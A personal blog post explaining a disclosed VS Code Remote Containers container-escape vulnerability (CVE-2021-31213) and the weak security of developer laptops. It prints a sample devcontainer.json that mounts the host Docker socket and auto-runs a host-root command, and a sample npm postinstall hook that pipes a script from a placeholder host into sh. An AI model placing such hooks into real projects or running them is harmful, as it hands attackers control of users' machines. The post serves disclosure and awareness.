CVE-2021-31213

Paul Hammond, 25 May 2021

Sometimes while I’m working on a project I have a sudden realization that two components aren’t connected the way everyone thinks they are. Often this is just a bug, usually one the team has been chasing for a while. Occasionally it’s a security hole. But I rarely get to write about it because the components are deep inside the infrastructure of a company that pays my wages.

Recently I had this experience while working with Visual Studio Code Remote Containers which resulted in my first public CVE number, so I’m going to take a moment to write about it, remind you that it’s easy to escape a Docker container, and that developer laptops are probably the weakest link in any company’s security.

VS Code has an action called “Remote-Containers: Clone Repository in Container Volume” which automates the process of downloading a codebase, installing all of the dependencies in a Docker container, running that container, and attaching your editor. I found a small problem: it’s possible for code in the repository to escape the sandbox provided by Docker and get root privileges on the host system.

To do this you need to do two things:

- configure the repository’s .devcontainer setup so that code inside the container can reach the host, for example by bind-mounting the Docker socket or a host directory, or by asking for a privileged container
- arrange for code from the repository to run automatically as the container is created and the editor attaches, for example via one of the lifecycle hooks like postCreateCommand
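
As an illustration (and not the exact proof of concept I reported), a malicious repository could combine those two ingredients in a .devcontainer/devcontainer.json along these lines; the image, the mount and the command are all placeholders:

```jsonc
{
  // Any image that ships a Docker client would do; this one is just convenient.
  "image": "docker:cli",

  // First half: bind-mount the host's Docker socket into the dev container.
  "mounts": [
    "source=/var/run/docker.sock,target=/var/run/docker.sock,type=bind"
  ],

  // Second half: runs automatically once the container is created, with no
  // interaction beyond the original "Clone Repository in Container Volume"
  // action. Talking to the host's Docker daemon lets this start another
  // container with the host filesystem mounted, i.e. root outside the sandbox.
  "postCreateCommand": "docker run --rm -v /:/host alpine touch /host/tmp/pwned-by-devcontainer"
}
```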

Combine these and someone just clicking on UI elements inside VS Code can find their laptop compromised. After I reported the issue, Microsoft added a simple warning before you perform the action, which is about as good a fix as they can make given how many possible variations there are on both halves of this attack.

Even though I’m writing about it and I reported it to Microsoft Security, I don’t think this is a serious bug. Programmers have been downloading untrusted code and running it locally since before I was born, and there are much easier ways to convince them to do this than a little-known feature of a VS Code extension. curl | sudo bash or ./configure && make && sudo make install are the two obvious variations, but any time you run something like npm install followed by npm start you’re hoping that none of the packages you just downloaded contains anything malicious.
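
To pick just one of those mechanisms: npm runs a package’s lifecycle scripts automatically at install time, so any dependency in your tree only needs something like this in its package.json (the name and URL below are invented):

```json
{
  "name": "innocent-looking-helper",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s https://example.invalid/payload.sh | sh",
    "start": "node index.js"
  }
}
```

Passing --ignore-scripts to npm install skips these hooks, but that isn’t the default and most workflows don’t use it.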

I also think the style of containerized development environment that Microsoft are building is likely to eventually be more secure than directories on laptops, even if there are problems along the way. Variations on this attack will have to be more advanced to work on a hosted product such as GitHub Codespaces. The costs of a sandbox escape there are a lot higher, so the development team does more work to avoid them and it’s more likely that centralized intrusion detection will catch an attack in action. And even if someone did manage to escape, the impact is lower: they’ll only get access to a few other projects that happen to be running on the same server, not to all of your keys, tokens and every photo you’ve taken in the last few years.

My experience is that developers demand the ability to run anything they want on their computers, even at companies with tightly locked down device management policies. I’m also only aware of maybe a dozen companies where long-lived production credentials never ever touch developer laptops. Given the apparent rise of software supply chain attacks recently, I wonder if both of those should change. Or maybe we’ll keep stumbling along hoping for the best.